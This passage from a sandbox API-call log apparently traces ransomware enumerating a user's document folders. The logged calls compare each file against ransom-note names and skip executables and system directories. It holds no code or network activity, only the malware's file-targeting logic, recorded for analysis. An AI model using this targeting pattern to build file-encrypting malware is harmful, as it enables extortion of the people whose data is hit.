(HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e610 [0105.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e808 | out: hHeap=0x6d0000) returned 1 [0105.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x77e808 [0105.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.042] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf56df30, ftCreationTime.dwHighDateTime=0x1d5daa6, ftLastAccessTime.dwLowDateTime=0x1cbc2500, ftLastAccessTime.dwHighDateTime=0x1d5e2e8, ftLastWriteTime.dwLowDateTime=0x1cbc2500, ftLastWriteTime.dwHighDateTime=0x1d5e2e8, nFileSizeHigh=0x0, nFileSizeLow=0x8f12, dwReserved0=0x0, dwReserved1=0x0, cFileName="PXapwoyUb.docx", cAlternateFileName="PXAPWO~1.DOC")) returned 1 [0105.042] lstrcmpW (lpString1="PXapwoyUb.docx", lpString2=".") returned 1 [0105.042] lstrcmpW (lpString1="PXapwoyUb.docx", lpString2="..") returned 1 [0105.042] lstrcmpiW (lpString1="PXapwoyUb.docx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.042] lstrcmpiW (lpString1="PXapwoyUb.docx", lpString2="Decryptor_Info.hta") returned 1 [0105.042] PathFindExtensionW (pszPath="PXapwoyUb.docx") returned=".docx" [0105.042] lstrcmpiW (lpString1=".docx", lpString2=".exe") returned -1 [0105.042] lstrcmpiW (lpString1=".docx", lpString2=".sys") returned -1 [0105.042] lstrcmpiW (lpString1=".docx", lpString2=".lnk") returned -1 [0105.042] lstrcmpiW (lpString1=".docx", lpString2=".dll") returned 1 [0105.042] lstrcmpiW (lpString1=".docx", lpString2=".msi") returned -1 [0105.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e610 [0105.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e698 [0105.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.042] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75c020 [0105.042] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e698 | out: hHeap=0x6d0000) returned 1 [0105.042] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x852cb120, ftCreationTime.dwHighDateTime=0x1d5e0ec, ftLastAccessTime.dwLowDateTime=0x3cf8ed70, ftLastAccessTime.dwHighDateTime=0x1d5dbc3, ftLastWriteTime.dwLowDateTime=0x3cf8ed70, ftLastWriteTime.dwHighDateTime=0x1d5dbc3, nFileSizeHigh=0x0, nFileSizeLow=0x15007, dwReserved0=0x0, dwReserved1=0x0, cFileName="v11WPZ.xls", cAlternateFileName="")) returned 1 [0105.042] lstrcmpW (lpString1="v11WPZ.xls", lpString2=".") returned 1 [0105.042] lstrcmpW (lpString1="v11WPZ.xls", lpString2="..") returned 1 [0105.043] lstrcmpiW (lpString1="v11WPZ.xls", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.043] lstrcmpiW (lpString1="v11WPZ.xls", lpString2="Decryptor_Info.hta") returned 1 [0105.043] PathFindExtensionW (pszPath="v11WPZ.xls") returned=".xls" [0105.043] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0105.043] lstrcmpiW (lpString1=".xls", lpString2=".sys") returned 1 [0105.043] lstrcmpiW (lpString1=".xls", lpString2=".lnk") returned 1 [0105.043] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0105.043] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0105.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e610 [0105.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e698 [0105.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75c0c8 [0105.043] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e698 | out: hHeap=0x6d0000) returned 1 [0105.043] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd73e1100, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xd2a7b680, ftLastAccessTime.dwHighDateTime=0x1d5dab5, ftLastWriteTime.dwLowDateTime=0xd2a7b680, ftLastWriteTime.dwHighDateTime=0x1d5dab5, nFileSizeHigh=0x0, nFileSizeLow=0x998c, dwReserved0=0x0, dwReserved1=0x0, cFileName="zIJ9l4vUg8q7Ye0AeiB.csv", cAlternateFileName="ZIJ9L4~1.CSV")) returned 1 [0105.043] lstrcmpW (lpString1="zIJ9l4vUg8q7Ye0AeiB.csv", lpString2=".") returned 1 [0105.043] lstrcmpW (lpString1="zIJ9l4vUg8q7Ye0AeiB.csv", lpString2="..") returned 1 [0105.043] lstrcmpiW (lpString1="zIJ9l4vUg8q7Ye0AeiB.csv", lpString2="ReadMe_Decryptor.txt") returned 1 [0105.043] lstrcmpiW (lpString1="zIJ9l4vUg8q7Ye0AeiB.csv", lpString2="Decryptor_Info.hta") returned 1 [0105.043] PathFindExtensionW (pszPath="zIJ9l4vUg8q7Ye0AeiB.csv") returned=".csv" [0105.043] lstrcmpiW (lpString1=".csv", lpString2=".exe") returned -1 [0105.043] lstrcmpiW (lpString1=".csv", lpString2=".sys") returned -1 [0105.043] lstrcmpiW (lpString1=".csv", lpString2=".lnk") returned -1 [0105.043] lstrcmpiW (lpString1=".csv", lpString2=".dll") returned -1 [0105.043] lstrcmpiW (lpString1=".csv", lpString2=".msi") returned -1 [0105.043] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e610 [0105.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e698 [0105.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.044] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xb0) returned 0x6e9648 [0105.044] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e698 | out: hHeap=0x6d0000) returned 1 [0105.044] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd73e1100, ftCreationTime.dwHighDateTime=0x1d5e2d8, ftLastAccessTime.dwLowDateTime=0xd2a7b680, ftLastAccessTime.dwHighDateTime=0x1d5dab5, ftLastWriteTime.dwLowDateTime=0xd2a7b680, ftLastWriteTime.dwHighDateTime=0x1d5dab5, nFileSizeHigh=0x0, nFileSizeLow=0x998c, dwReserved0=0x0, dwReserved1=0x0, cFileName="zIJ9l4vUg8q7Ye0AeiB.csv", cAlternateFileName="ZIJ9L4~1.CSV")) returned 0 [0105.044] FindClose (in: hFindFile=0x77e110 | out: hFindFile=0x77e110) returned 1 [0105.044] FindNextFileW (in: hFindFile=0x77e0d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2daf00a0, ftCreationTime.dwHighDateTime=0x1d5dfc6, ftLastAccessTime.dwLowDateTime=0xc3836360, ftLastAccessTime.dwHighDateTime=0x1d5e669, ftLastWriteTime.dwLowDateTime=0xc3836360, ftLastWriteTime.dwHighDateTime=0x1d5e669, nFileSizeHigh=0x0, nFileSizeLow=0x18189, dwReserved0=0x0, dwReserved1=0x0, cFileName="K2SQa33U.pptx", cAlternateFileName="K2SQA3~1.PPT")) returned 1 [0105.044] lstrcmpW (lpString1="K2SQa33U.pptx", lpString2=".") returned 1 [0105.044] lstrcmpW (lpString1="K2SQa33U.pptx", lpString2="..") returned 1 [0105.044] lstrcmpiW (lpString1="K2SQa33U.pptx", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.044] lstrcmpiW (lpString1="K2SQa33U.pptx", lpString2="Decryptor_Info.hta") returned 1 [0105.044] PathFindExtensionW (pszPath="K2SQa33U.pptx") returned=".pptx" [0105.044] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0105.044] lstrcmpiW (lpString1=".pptx", lpString2=".sys") returned -1 [0105.044] lstrcmpiW (lpString1=".pptx", lpString2=".lnk") returned 1 [0105.044] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0105.045] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0105.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x77e610 [0105.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x77e688 [0105.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75c170 [0105.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e688 | out: hHeap=0x6d0000) returned 1 [0105.045] FindNextFileW (in: hFindFile=0x77e0d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c98d8e0, ftCreationTime.dwHighDateTime=0x1d5e03f, ftLastAccessTime.dwLowDateTime=0xa08d46a0, ftLastAccessTime.dwHighDateTime=0x1d5e754, ftLastWriteTime.dwLowDateTime=0xa08d46a0, ftLastWriteTime.dwHighDateTime=0x1d5e754, nFileSizeHigh=0x0, nFileSizeLow=0x2ffc, dwReserved0=0x0, dwReserved1=0x0, cFileName="MY5h2w Zql7liGw mDEf.odp", cAlternateFileName="MY5H2W~1.ODP")) returned 1 [0105.045] lstrcmpW (lpString1="MY5h2w Zql7liGw mDEf.odp", lpString2=".") returned 1 [0105.045] lstrcmpW (lpString1="MY5h2w Zql7liGw mDEf.odp", lpString2="..") returned 1 [0105.045] lstrcmpiW (lpString1="MY5h2w Zql7liGw mDEf.odp", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.045] lstrcmpiW (lpString1="MY5h2w Zql7liGw mDEf.odp", lpString2="Decryptor_Info.hta") returned 1 [0105.045] PathFindExtensionW (pszPath="MY5h2w Zql7liGw mDEf.odp") returned=".odp" [0105.045] lstrcmpiW (lpString1=".odp", lpString2=".exe") returned 1 [0105.045] lstrcmpiW (lpString1=".odp", lpString2=".sys") returned -1 [0105.045] lstrcmpiW (lpString1=".odp", lpString2=".lnk") returned 1 [0105.045] lstrcmpiW (lpString1=".odp", lpString2=".dll") returned 1 [0105.045] lstrcmpiW (lpString1=".odp", lpString2=".msi") returned 1 [0105.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x77e610 [0105.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x77e688 [0105.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.045] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa0) returned 0x75c208 [0105.045] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e688 | out: hHeap=0x6d0000) returned 1 [0105.045] FindNextFileW (in: hFindFile=0x77e0d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0bc950, ftCreationTime.dwHighDateTime=0x1d5e151, ftLastAccessTime.dwLowDateTime=0x3cbd8580, ftLastAccessTime.dwHighDateTime=0x1d5e3ef, ftLastWriteTime.dwLowDateTime=0x3cbd8580, ftLastWriteTime.dwHighDateTime=0x1d5e3ef, nFileSizeHigh=0x0, nFileSizeLow=0xd0cb, dwReserved0=0x0, dwReserved1=0x0, cFileName="nPBObvG51sSTj.ods", cAlternateFileName="NPBOBV~1.ODS")) returned 1 [0105.045] lstrcmpW (lpString1="nPBObvG51sSTj.ods", lpString2=".") returned 1 [0105.045] lstrcmpW (lpString1="nPBObvG51sSTj.ods", lpString2="..") returned 1 [0105.045] lstrcmpiW (lpString1="nPBObvG51sSTj.ods", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.046] lstrcmpiW (lpString1="nPBObvG51sSTj.ods", lpString2="Decryptor_Info.hta") returned 1 [0105.046] PathFindExtensionW (pszPath="nPBObvG51sSTj.ods") returned=".ods" [0105.046] lstrcmpiW (lpString1=".ods", lpString2=".exe") returned 1 [0105.046] lstrcmpiW (lpString1=".ods", lpString2=".sys") returned -1 [0105.046] lstrcmpiW (lpString1=".ods", lpString2=".lnk") returned 1 [0105.046] lstrcmpiW (lpString1=".ods", lpString2=".dll") returned 1 [0105.046] lstrcmpiW (lpString1=".ods", lpString2=".msi") returned 1 [0105.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x70) returned 0x77e610 [0105.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xa6) returned 0x77e688 [0105.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.046] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75c2b0 [0105.046] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e688 | out: hHeap=0x6d0000) returned 1 [0105.046] FindNextFileW (in: hFindFile=0x77e0d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xce8c0c20, ftCreationTime.dwHighDateTime=0x1d5e2aa, ftLastAccessTime.dwLowDateTime=0xa29a1710, ftLastAccessTime.dwHighDateTime=0x1d5e566, ftLastWriteTime.dwLowDateTime=0xa29a1710, ftLastWriteTime.dwHighDateTime=0x1d5e566, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WgsaRbbd", cAlternateFileName="")) returned 1 [0105.046] lstrcmpW (lpString1="WgsaRbbd", lpString2=".") returned 1 [0105.046] lstrcmpW (lpString1="WgsaRbbd", lpString2="..") returned 1 [0105.046] lstrlenW (lpString="WgsaRbbd") returned 8 [0105.046] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\", lpString2="WgsaRbbd" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd" [0105.046] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Windows") returned -1 [0105.046] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.046] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.046] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\ProgramData") returned 1 [0105.046] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.046] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.046] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Intel") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\msys32") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Qt") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\ProgramData") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Program Files") returned 1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Windows") returned -1 [0105.047] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="C:\\Program Files (x86)") returned 1 [0105.047] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\" [0105.047] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\") returned 60 [0105.047] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77e110 [0105.047] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0105.047] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xce8c0c20, ftCreationTime.dwHighDateTime=0x1d5e2aa, ftLastAccessTime.dwLowDateTime=0xa29a1710, ftLastAccessTime.dwHighDateTime=0x1d5e566, ftLastWriteTime.dwLowDateTime=0xa29a1710, ftLastWriteTime.dwHighDateTime=0x1d5e566, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0105.047] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0105.047] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0105.048] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe09c77d0, ftCreationTime.dwHighDateTime=0x1d5e21c, ftLastAccessTime.dwLowDateTime=0x31dce400, ftLastAccessTime.dwHighDateTime=0x1d5e3c5, ftLastWriteTime.dwLowDateTime=0x31dce400, ftLastWriteTime.dwHighDateTime=0x1d5e3c5, nFileSizeHigh=0x0, nFileSizeLow=0x25c6, dwReserved0=0x0, dwReserved1=0x0, cFileName="03g4_AE.ppt", cAlternateFileName="")) returned 1 [0105.048] lstrcmpW (lpString1="03g4_AE.ppt", lpString2=".") returned 1 [0105.048] lstrcmpW (lpString1="03g4_AE.ppt", lpString2="..") returned 1 [0105.048] lstrcmpiW (lpString1="03g4_AE.ppt", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.048] lstrcmpiW (lpString1="03g4_AE.ppt", lpString2="Decryptor_Info.hta") returned -1 [0105.048] PathFindExtensionW (pszPath="03g4_AE.ppt") returned=".ppt" [0105.048] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0105.048] lstrcmpiW (lpString1=".ppt", lpString2=".sys") returned -1 [0105.048] lstrcmpiW (lpString1=".ppt", lpString2=".lnk") returned 1 [0105.048] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0105.048] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0105.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e610 [0105.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e698 [0105.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.048] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75c348 [0105.048] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e698 | out: hHeap=0x6d0000) returned 1 [0105.048] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe05aaae0, ftCreationTime.dwHighDateTime=0x1d5e00e, ftLastAccessTime.dwLowDateTime=0x165db910, ftLastAccessTime.dwHighDateTime=0x1d5e236, ftLastWriteTime.dwLowDateTime=0x165db910, ftLastWriteTime.dwHighDateTime=0x1d5e236, nFileSizeHigh=0x0, nFileSizeLow=0xa387, dwReserved0=0x0, dwReserved1=0x0, cFileName="E T0i.pdf", cAlternateFileName="ET0I~1.PDF")) returned 1 [0105.048] lstrcmpW (lpString1="E T0i.pdf", lpString2=".") returned 1 [0105.048] lstrcmpW (lpString1="E T0i.pdf", lpString2="..") returned 1 [0105.048] lstrcmpiW (lpString1="E T0i.pdf", lpString2="ReadMe_Decryptor.txt") returned -1 [0105.048] lstrcmpiW (lpString1="E T0i.pdf", lpString2="Decryptor_Info.hta") returned 1 [0105.048] PathFindExtensionW (pszPath="E T0i.pdf") returned=".pdf" [0105.048] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0105.048] lstrcmpiW (lpString1=".pdf", lpString2=".sys") returned -1 [0105.049] lstrcmpiW (lpString1=".pdf", lpString2=".lnk") returned 1 [0105.049] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0105.049] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0105.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x80) returned 0x77e610 [0105.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xbe) returned 0x77e698 [0105.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e610 | out: hHeap=0x6d0000) returned 1 [0105.049] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x75c3e0 [0105.049] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x77e698 | out: hHeap=0x6d0000) returned 1 [0105.049] FindNextFileW (in: hFindFile=0x77e110, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8c703670, ftCreationTime.dwHighDateTime=0x1d5dc7b, ftLastAccessTime.dwLowDateTime=0xa9ab3ec0, ftLastAccessTime.dwHighDateTime=0x1d5dc34, ftLastWriteTime.dwLowDateTime=0xa9ab3ec0, ftLastWriteTime.dwHighDateTime=0x1d5dc34, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="gfnKOcqFgrM6L", cAlternateFileName="GFNKOC~1")) returned 1 [0105.049] lstrcmpW (lpString1="gfnKOcqFgrM6L", lpString2=".") returned 1 [0105.049] lstrcmpW (lpString1="gfnKOcqFgrM6L", lpString2="..") returned 1 [0105.049] lstrlenW (lpString="gfnKOcqFgrM6L") returned 13 [0105.049] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\", lpString2="gfnKOcqFgrM6L" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L" [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Windows") returned -1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp") returned 1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\ProgramData") returned 1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow") returned 1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft") returned 1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos") returned -1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned -1 [0105.049] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music") returned -1 [0105.050] lstrcmpiW (lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\KjWgNXSB5P\\WgsaRbbd\\gfnKOcqFgrM6L", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0105.050] lstrcmpiW 